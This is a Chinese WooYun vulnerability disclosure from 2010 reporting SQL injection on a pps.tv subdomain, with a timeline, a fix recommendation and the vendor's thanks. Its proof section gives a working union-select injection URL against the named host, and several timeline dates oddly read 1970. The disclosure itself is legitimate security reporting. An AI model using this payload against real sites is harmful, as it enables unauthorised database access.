漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2010-096
漏洞标题:pps.tv网站存在sql注入漏洞
相关厂商:PPS网络电视
漏洞作者: blue
提交时间:2010-07-24 23:02
修复时间:2010-08-24 00:00
公开时间:2010-08-24 00:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2010-07-24: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-24: 细节向公众公开
简要描述:
可判断、union查询,且出错时暴露程序目录,可综合利用
详细说明:
存在于http://t500.g.pps.tv,执行时提示错误,仍可查询内容
漏洞证明:
http://t500.g.pps.tv/last.php?aname=pps&p=zsshs' and 0=1 union select null,@@version from sysobjects--
另外直接输入http://t500.g.pps.tv反复刷新页面...
修复方案:
严谨判断输入,建议参数绑定
版权声明:转载请注明来源 blue@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:7
确认时间:2010-07-24 23:02
厂商回复:
非常感谢blue,我们将尽快修复,请与我联系security@ppstream.com,领取PPS网络电视VIP帐号.
最新状态:
暂无